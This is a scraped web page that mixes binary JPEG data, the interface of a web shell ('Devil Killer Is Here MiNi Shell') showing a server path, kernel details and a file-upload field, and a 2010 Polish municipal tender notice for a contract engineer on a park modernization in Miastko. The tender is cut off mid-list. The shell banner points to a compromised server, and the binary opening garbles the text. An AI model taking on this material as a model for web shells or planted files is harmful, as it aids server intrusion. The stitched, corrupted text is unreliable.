JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100223/51204-N-2010.html

<p class="kh_header"><b>Miastko: Pełnienie funkcji inżyniera kontraktu realizacji projektu pn.:Modernizacja parku miejskiego w Miastku</b><br>
<b>Numer ogłoszenia: 51204 - 2010; data zamieszczenia: 23.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miastko , ul. Grunwaldzka 1, 77-200 Miastko, woj. pomorskie, tel. 059 8572081, faks 059 8572368.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miastko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inżyniera kontraktu realizacji projektu pn.:Modernizacja parku miejskiego w Miastku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi polegającej na pełnieniu funkcji Inżyniera kontraktu w  zakresie zarządzania, kontrolowania, nadzorowania i rozliczania realizacji projektu pn.: Modernizacja parku miejskiego w Miastku.
Opis przedmiotu zamówienia objętego pełnieniem funkcji Inżyniera kontraktu przedstawia dokumentacja projektowa na roboty budowlane związane z wykonaniem modernizacji parku miejskiego w Miastku: - załącznik nr 14 do siwz; 
I.Zakres rzeczowy przedmiotu zamówienia obejmuje:
1. Zapoznanie się z całą dokumentacją formalną-prawną jaka obowiązuje strony - odpowiednio;         Zamawiający, Inżynier Kontraktu, Wykonawca robót,  od początku realizacji inwestycji do przyjęcia rozliczenia końcowego bez zastrzeżeń przez Zamawiającego i Instytucję Zarządzającą projektem w imieniu Marszałka Województwa Pomorskiego. 
Dokumentacja formalno-prawna  składa się z :
1) wniosek nr WND-RPPM.08.01.02-00-005/09 z dnia 02.04.2009r. (wraz z załącznikami);
2) umowa nr UDA-RPPM.08.01.02-00-005/09-00 z dn. 01.12.2009r.. o dofinansowanie projektu,;
3) Przewodnik Beneficjenta RPO WP 2007-2013 (zał. nr 1 do uchwały 1166/248/09 Zarządu Województwa Pomorskiego z dnia 17 września 2009r. wraz z załącznikami);
4) dokumentacja projektowa obejmująca wykonanie robót budowlanych objętych pozwoleniem na budowę nr 007/2009/MI z dn. 29.01.2009r
5) inne dokumenty, które są obowiązujące na podstawie ww. wymienionych dokumentów lub, które dopiero zostaną wytworzone, a w szczególności te, których obowiązek sporządzenia wynika lub będzie wynikał z  wytycznych określonych w Przewodniku Beneficjenta RPO WP 2007-2013 oraz jakie powstaną w wyniku przeprowadzenia postępowań ws. udzielenia zamówienia wykonawcy robót budowlanych (dokumentacja przetargowa, najkorzystniejsza oferta, umowa z wykonawcą robót budowlanych,
2. Udział w posiedzeniu komisji przetargowej w roli doradcy w kwestiach technicznych  postępowania o  udzielenie zamówienia na roboty budowlane,
3. Zgłaszanie ewentualnych uwag (wniosków) w odniesieniu do treści dokumentacji projektowych,
4. Organizacja i udział w przekazaniu terenu budowy Wykonawcy - w tym sporządzenie stosownego protokołu,
5. Organizowanie i prowadzenie narad koordynacyjnych - nie mniej niż  jeden raz na dwa tygodnie, a w zależności od potrzeb częściej zgodnie z żądaniem Zamawiającego,
6. Wykonywanie czynności inspektora nadzoru w branży drogowej, sanitarnej, elektrycznej i zieleni zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (t.j. Dz.U. z 2003r. Nr 207, poz. 2016 z  późn. zm.),
7. Kontrola zgodności realizacji robót budowlanych z dokumentacją projektową, specyfikacją istotnych warunków zamówienia, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, treścią oferty Wykonawcy i zawartą z nim umową, 
8. Koordynacja realizacji robót w celu zachowania ich postępu zgodnie z harmonogramem rzeczowo-finansowym,
9. Weryfikowanie, aktualizowanie i sporządzanie  harmonogramów rzeczowo-finansowych w zależności od potrzeb,
10. Zgłaszanie Zamawiającemu w razie potrzeby konieczności wykonania robót dodatkowych,  zamiennych -  sporządzanie na tę okoliczność protokołów konieczności (robót zamiennych) i przedkładanie ich Zamawiającemu do akceptacji przed realizacją tych robót,
11. Wwidencjonowanie kosztów inwestycji i ich rozliczanie z Zamawiającym w okresach miesięcznych,
12. Przygotowanie i przedstawianie comiesięcznych sprawozdań z postępu robót i realizacji wydatków zaplanowanych nakładów finansowych w tym współpraca z instytucją wspólfinansujacą realizację zadania,
13. Sporządzanie i przekazywanie Zamawiającemu niezbędnych dokumentów do uruchamiania finansowania inwestycji zgodnie z procedurą wynikającą z Przewodnika Beneficjenta RPO WP 2007-2013,                             a w szczególności przygotowanie wniosku o płatność do  Instytucji Zarządzającej RPO WP jak i pozostałych biorących udział w finansowaniu projektu,
14. Sprawdzanie szczegółowych kalkulacji, kosztorysów powykonawczych, faktur wraz z załączonymi dokumentami przedstawionych przez wykonawców, dostawców i usługobiorców oraz uzgadnianie wydatków i kosztów realizowanej inwestycji,
15. Spowodowanie , w razie potrzeby, naniesienia zmian w dokumentacji projektowej i przekazanie Zamawiającemu dokumentacji powykonawczej,
16. Przygotowanie i dokonywanie odbiorów robót ulegających zakryciu, zanikowych, odbiorów częściowych robót oraz odbioru końcowego zgodnie z warunkami określonymi w umowie z Wykonawcą robót i w innych dokumentach kontraktu, 
17. Dokonywanie w uzgodnieniu z Zamawiającym zmian wynikłych w trakcie realizacji robót,
18. Sporządzanie opinii dotyczących wad przedmiotu umowy, uznanych za nie nadających się do ich usunięcia oraz wnioskowanie o obniżenie wynagrodzenia wykonawcom z określeniem i utraty wartości robót i kwot obniżonego wynagrodzenia za te roboty,
19. Zawiadamianie Zamawiającego i Wykonawcę o stwierdzonych wadach w jego robotach w okresie rękojmi,
20. Sporządzanie wniosków o zapłatę kar umownych za zwłokę Wykonawcy w realizacji inwestycji oraz za zwłokę w usunięciu usterek stwierdzonych przy odbiorze robót,
21. Sporządzenie i dostarczenie Zamawiającemu ostatecznego rozliczenia zrealizowanej i odebranej inwestycji  w tym operatu odbiorczego wraz z protokołem OT/przyjęcia środka trwałego w terminie do 14 listopada 2010r. tj  w ciągu 14 dni licząc od terminu odbioru końcowego inwestycji planowanego na dzień 31 października 2010r - rozumianego jako datę podpisania przez Zamawiającego protokołu końcowego odbioru zamówienia (robót) po zrealizowaniu całego zakresu rzeczowego,
22. Zgłoszenie zrealizowanej inwestycji do użytkowania (przygotowanie dokumentacji i wniosku),
23. Uczestniczenie w czynnościach kontrolnych sprawowanych przez organ nadzoru budowlanego i jednostek   sprawujących funkcje kontrolne dotyczące projektu,
24. Udział w pracach komisji związanych z przeglądami gwarancyjnymi,
25. udział w przeglądach pogwarancyjnych i sporządzanie protokołów pogwarancyjnych,
26. Spowodowanie zastępczego usunięcia w okresie rękojmi wad i usterek na koszt Wykonawcy,
II.Warunki realizacji (wykonania) przedmiotu zamówienia
1. Obowiązujące dokumenty kontraktowe - wymienione w poz. 1. zakresu rzeczowego przedmiotu zamówienia
2. Inżynier kontraktu zobowiązany jest pełnić swoją funkcję zgodnie z wymaganiami wynikającymi z dokumentów kontraktowych i  obowiązujących przepisów odnoszących się do przedmiotu zamówienia w zakresie realizacji robót budowlanych, stosowania materiałów i urządzeń, sprawowania nadzoru (funkcji inspektora nadzoru) w branży zieleni, sanitarnej, elektrycznej, drogowej, zawartych m.in. w  ustawie z dnia 7 lipca 1994 r. - Prawo budowlane (t.j. Dz.U. z 2003r. Nr207, poz. 2016 z  późn. zm.) i innych,
3. Inżynier kontraktu zobowiązany jest do obecności na terenie budowy na każde żądanie Zamawiającego w sytuacji, w której  jego nieobecność grozi Zamawiającemu poniesieniem szkody, lub innymi sankcjami związanymi z przebiegiem realizacji robót. W takim przypadku przybycie musi nastąpić w dniu  zgłoszenia takiej konieczności,
4. Częstotliwość inspekcji robót musi zabezpieczać jakość ich wykonania i umożliwiać Wykonawcy postęp robót zgodnie z przyjętym harmonogramem.  W przypadku prowadzenia robót  w strefach podwyższonego zagrożenia  obecność Inżyniera kontraktu  powinna być adekwatna do stopnia ewentualnego zagrożenia,
5. Inżynier kontraktu zobowiązany jest do reagowania na bieżąco z natychmiastowym zawiadamianiem Zamawiającego  o zagrożeniach terminów realizacyjnych przyjętych w harmonogramie,
6. Wszelkie polecenia, decyzje, uwagi muszą być bezwzględnie wydawane na piśmie (wpisem w dzienniku budowy),
7. W przypadku nie wywiązywania się określonych osób z  nałożonych obowiązków  dotyczących sprawowania  nadzoru (funkcji inspektora nadzoru), a także w przypadku złej współpracy z  Zamawiającym i Wykonawcą, Zamawiający  jest uprawniony  do żądania zmiany osoby, której to dotyczy a Inżynier kontraktu to żądanie musi spełnić; w razie odmowy spełnienia takiego żądania, Zamawiający po określonej na piśmie dacie wzywającej do zaprzestania sprawowania  nadzoru inwestorskiego (dla danej branży) jest uprawniony do wyznaczenia takiej osoby we własnym zakresie, a wynagrodzenie brutto przysługujące tej osobie będzie potrącane z faktur wystawianych przez Inżyniera kontraktu za świadczenie jego usługi,   
8. Jeżeli z  przyczyn nie nazwanych na etapie prowadzonego postępowania termin ostatecznego finansowego rozliczenia projektu ulegnie przedłużeniu to fakt ten nie zwalnia Inżyniera kontraktu z  obowiązku  ostatecznego finansowego rozliczenia projektu pod rygorem odmowy określonej części wynagrodzenia, równoważnej wysokości wynagrodzenia za zlecenie  dokonania przedmiotowego rozliczenia osobom trzecim, 
9. Zagwarantowanie przedłużenia obowiązku wykonywania czynności określonych w poz. 24. do poz. 26 zakresu rzeczowego przedmiotu zamówienia na okres objęty gwarancją udzieloną przez  wykonawcę  robót budowlanych, bez dodatkowego wynagrodzenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.54.10.00-2, 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Na podstawie  art. 45 ust. 2  Pzp  zamawiający żąda od wykonawców ubiegających się o udzielenie   zamówienia  wniesienia wadium w  kwocie 1.000,00  PLN  (słownie: tysiąc  złotych  00/100). Wykonawca ubiegający się o udzielenie zamówienia  zobowiązany jest do wniesienia wadium przed  upływem terminu składania ofert tj. do dnia 5 marca 2010r. do godz. 11:00. 
Wadium  może być wnoszone w jednej lub kilku następujących formach: 
1)w pieniądzu;
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy musi być poręczeniem pieniężnym;
3)gwarancjach bankowych;  
4)gwarancjach ubezpieczeniowych;
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, ze zm.). Wadium wnoszone w pieniądzu musi być wpłacone  przelewem na rachunek bankowy Zamawiającego -  PKO BP  O/Miastko,  nr  97 1020 4708 0000 7102 0004 4362. Wniesione w ten sposób wadium będzie skuteczne jeżeli w podanym terminie tj. do dnia 5 marca  2010r. do godz. 1100 znajdzie się na rachunku bankowym Zamawiającego. W przeciwnym przypadku wykonawca zostanie wykluczony z postępowania. Dlatego też należy dochować należytej staranności aby nie dopuścić do uchybienia wskazanego terminu.
Uwaga: Niedopuszczalna jest forma gotówkowej wpłaty w kasie Urzędu  Miejskiego w Miastku.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przepisy prawa nie nakładają obowiązkuposiadania uprawnień (koncesji, zezwoleń, licencji) do wykonywania działalności gospodarczej w zakresie upoważniających wykonawcę do ubiegania się o udzielenie i realizację zamówienia będącego przedmiotem niniejszego ogłoszenia (postępowania);</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunków wykonawcy zobowiązani są do wykazania, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali (zakończyli) jako wykonawca lub podwykonawca  nie mniej niż jedną usługę polegającą na sprawowaniu funkcji Inżyniera kontraktu (Inspektora nadzoru) łącznie:
a) nad nie mniej niż jedną robotą budowlaną odpowiadającą swym rodzajem niniejszemu zamówieniu - polegającą na budowie, przebudowie nawierzchni parkowych, chodników z kostki polbruk lub kostki granitowej, o wartości nie mniejszej niż 500.000,00 PLN brutto (pięćset tysięcy złotych),
b) nad nie mniej niż jedną usługą odnoszącą się do: wycinki drzew i zakrzewień oraz nasadzeń nowych roślin ozdobnych, zakrzewień i drzew także wykonanie nowych trawników, o wartości nie mniejszej niż  200.000,00 PLN brutto (dwieście tysięcy złotych), w ramach wykonania, przebudowy, odtworzenia parków miejskich, terenów zieleni o charakterze rekreacyjnym o powierzchni nie mniejszej niż. 1 ha, lub poleganie na wiedzy i doświadczeniu w zakresie w/w oddanym do dyspozycji przez inne podmioty na okres korzystania przy wykonywaniu zamówienia. Ocena spełnienia przedmiotowego warunku zostanie dokonana w oparciu o wymagane dokumenty jakie wykonawcy zobowiązani są dołączyć do oferty na potwierdzenie jego spełniania, określone w ogłoszeniu i odpowiednio w siwz. Ocena zostanie dokonana metodą spełnia/niespełna. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia stosownie do art. 23 ustawy Pzp. (np. na podstawie umowy konsorcjalnej) opisany warunek powinny spełniać wspólnie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunków wykonawcy zobowiązani są do wykazania dysponowania następującym potencjałem technicznym niezbędnym do wykonania zamówienia: środek transportu pozostający do dyspozycji osób przewidzianych do realizacji zamówienie w zakresie, umożliwiającym pozostawania tych osób do dyspozycji wykonawcy robót budowlanych(projektu) - 1 szt., lub poleganie na w/w potencjale oddanym do dyspozycji przez inne podmioty na okres korzystania przy wykonywaniu zamówienia. Ocena spełniania przedmiotowego warunku zostanie dokonana w oparciu o wymagane dokumenty jakie wykonawcy zobowiązani są dołączyć do oferty na potwierdzenie jego spełniania, określone w ogłoszeniu i odpowiednio w siwz. Ocena zostanie dokonana metodą spełnia/niespełna. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia stosownie do art. 23 ustawy Pzp. (np. na podstawie umowy konsorcjalnej) opisany warunek powinny spełniać wspólnie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunków wykonawcy zobowiązani są do wykazania dysponowania następującymi osobami:1)osobą przewidzianą do zarządzania, kontrolowania, nadzorowania robót w zakresie branży drogowej posiadającej odpowiednie dla tego zadania uprawnienia o specjalności drogowej, będącą członkiem Okręgowej Izby Inżynierów Budownictwa zgodnie z ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów, lub posiadającą stosowne uprawnienia upoważniające ją do pełnienia w/w. funkcji na terenie Polski w przypadku osoby z kraju członkowskiego Unii Europejskiej,
-  legitymującymi się nie mniejszym niż 3 letnim stażem zawodowym, 
2)osobą przewidzianą do zarządzania, kontrolowania, nadzorowania robót w zakresie branży elektrycznej - posiadająca odpowiednie uprawnienia budowlane w tym zakresie o specjalności elektrycznej, będącą członkiem Okręgowej Izby Inżynierów Budownictwa zgodnie z ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów,  lub posiadającą stosowne uprawnienia upoważniające ją do pełnienia w/w. funkcji na terenie Polski w przypadku osoby z kraju członkowskiego Unii Europejskiej,
-  legitymującymi się nie mniejszym niż 3 letnim stażem zawodowym;
3) osobą przewidzianą do zarządzania, kontrolowania, nadzorowania robót w zakresie branży sanitarnej - posiadająca odpowiednie uprawnienia budowlane w tym zakresie o specjalności sanitarnej, będącą członkiem Okręgowej Izby Inżynierów Budownictwa zgodnie z ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów, lub 
posiadającą stosowne uprawnienia upoważniające ją do pełnienia w/w. funkcji na terenie Polski w przypadku osoby z kraju członkowskiego Unii Europejskiej,
-  legitymującymi się nie mniejszym niż 3 letnim stażem zawodowym;
4) osobą przewidzianą do obsługi finansowo-rzeczowej, sprawozdawczo-rozliczeniowej projektu legitymującą się 3 letnim stażem zawodowym w tym zakresie odnoszącym się do obsługi inwestycji jak przedmiot zamówienia, odnosi się to również do osób z kraju członkowskiego Unii 
  Europejskiej ;
5) osobą przewidzianą do zarządzania, kontrolowania, nadzorowania robót w zakresie zieleni posiadającą odpowiednie wykształcenie: architekta krajobrazu lub leśnika, rolnika, ogrodnika 
-  legitymującymi się nie mniejszym niż 3 letnim stażem zawodowym, oraz nadzorowaniem robót w zakresie zieleni w ramach uczestnictwa w realizacji projektu o wartości robót nie mniejszej niż wskazanej w pkt. III.3.2) pkt. b, odnosi się to również do osób z kraju członkowskiego Unii Europejskiej lub poleganie na w/w potencjale oddanym do dyspozycji przez inne podmioty na okres korzystania przy wykonywaniu zamówienia. 
Ocena spełniania przedmiotowego warunku zostanie dokonana w oparciu o wymagane dokumenty jakie wykonawcy zobowiązani są dołączyć do oferty na potwierdzenie jego spełnienia, określone w ogłoszeniu i odpowiedniow siwz. Ocena zostanie dokonana metodą spełnia/niespełna. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia stosownie do art. 23 ustawy Pzp. (np. na podstawie umowy konsorcjalnej) opisany warunek powinny spełniać wspólnie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunków wykonawcy zobowiązani są do wykazania: ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 300.000,00 PLN (słownie: trzysta tysięcy złotych) na czas wykonania zamówienia, lub poleganie na zdolnościach finansowych oddanych do dyspozycji przez inne podmioty na okres korzystania z nich przy wykonywaniu zamówienia. Ocena spełniania przedmiotowego warunku zostanie dokonana w oparciu o wymagane dokumenty jakie wykonawcy zobowiązani są dołączyć do oferty na potwierdzenie jego spełnienia, określone w ogłoszeniu i odpowiednio w siwz. Przy czym załączona do oferty opłacona polisa lub inny stosowny dokument  powinien być  aktualny (ważny) na dzień wyznaczony do składania ofert. W przypadku wygaśnięcia jego ważności po terminie wyznaczonym do składania ofert lecz przed zawarciem umowy, Wykonawca, którego oferta zostanie uznana za najkorzystniejszą zobowiązany jest do przedłożenie ważnego (zaktualizowanego) dokumentu obowiązującego przez cały okres realizacji zamówienia najpóźniej w dniu wyznaczonym na zawarcie umowy - przed jej podpisaniem. Nie przedłożenie w/w dokumentów w opisanych okolicznościach będzie traktowane przez Zamawiającego jako odstąpienie przez Wykonawcę od zawarcia umowy. Ocena zostanie dokonana metodą spełnia/niespełna. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia stosownie do art. 23 ustawy Pzp. (np. na podstawie umowy konsorcjalnej) opisany warunek powinny spełniać wspólnie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

